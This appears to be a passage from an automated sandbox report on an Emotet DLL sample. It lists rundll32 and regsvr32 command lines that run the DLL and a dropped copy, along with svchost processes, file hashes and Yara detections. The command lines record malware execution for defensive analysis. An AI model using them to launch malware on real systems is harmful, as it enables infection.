                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.452429989.0000000002810000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_2, Description: Yara detected Emotet, Source: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Author: Joe Security
                            Reputation:high

                            Target ID:3
                            Start time:13:16:31
                            Start date:22/07/2022
                            Path:C:\Windows\System32\rundll32.exe
                            Wow64 process (32bit):false
                            Commandline:rundll32.exe "C:\Users\user\Desktop\5CUFfVMSaQ.dll",#1
                            Imagebase:0x7ff644760000
                            File size:69632 bytes
                            MD5 hash:73C519F050C20580F8A62C849D49215A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.448904188.0000025326DA1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.448824975.0000025325750000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:high

                            Target ID:4
                            Start time:13:16:31
                            Start date:22/07/2022
                            Path:C:\Windows\System32\rundll32.exe
                            Wow64 process (32bit):false
                            Commandline:rundll32.exe C:\Users\user\Desktop\5CUFfVMSaQ.dll,ABeFtrnwmgAedx
                            Imagebase:0x7ff644760000
                            File size:69632 bytes
                            MD5 hash:73C519F050C20580F8A62C849D49215A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.449537237.00000237550F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.449599584.0000023755221000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:high

                            Target ID:5
                            Start time:13:16:34
                            Start date:22/07/2022
                            Path:C:\Windows\System32\rundll32.exe
                            Wow64 process (32bit):false
                            Commandline:rundll32.exe C:\Users\user\Desktop\5CUFfVMSaQ.dll,AEjATaIExpQg
                            Imagebase:0x7ff644760000
                            File size:69632 bytes
                            MD5 hash:73C519F050C20580F8A62C849D49215A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:6
                            Start time:13:16:35
                            Start date:22/07/2022
                            Path:C:\Windows\System32\regsvr32.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NCybOKcMqaEIN\jnEWIdoCfnPf.dll"
                            Imagebase:0x7ff6727f0000
                            File size:24064 bytes
                            MD5 hash:D78B75FC68247E8A63ACBA846182740E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Emotet_3, Description: , Source: 00000006.00000002.964376372.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.964724556.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_2, Description: Yara detected Emotet, Source: 00000006.00000002.965051526.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.964860380.0000000002911000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:high

                            Target ID:7
                            Start time:13:16:38
                            Start date:22/07/2022
                            Path:C:\Windows\System32\rundll32.exe
                            Wow64 process (32bit):false
                            Commandline:rundll32.exe C:\Users\user\Desktop\5CUFfVMSaQ.dll,AbfBlUFQKbpevAFdaCpElBdscB
                            Imagebase:0x7ff644760000
                            File size:69632 bytes
                            MD5 hash:73C519F050C20580F8A62C849D49215A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:11
                            Start time:13:16:53
                            Start date:22/07/2022
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                            Imagebase:0x7ff78ca80000
                            File size:51288 bytes
                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:12
                            Start time:13:16:54
                            Start date:22/07/2022
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                            Imagebase:0x7ff78ca80000
                            File size:51288 bytes
                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:14
                            Start time:13:17:10
                            Start date:22/07/2022
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                            Imagebase:0x7ff78ca80000
                            File size:51288 bytes
                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:18
                            Start time:13:17:31
                            Start date:22/07/2022
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                            Imagebase:0x7ff78ca80000
                            File size:51288 bytes
                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:20
                            Start time:13:17:49
                            Start date:22/07/2022
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                            Imagebase:0x7ff78ca80000
                            File size:51288 bytes
                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            No disassembly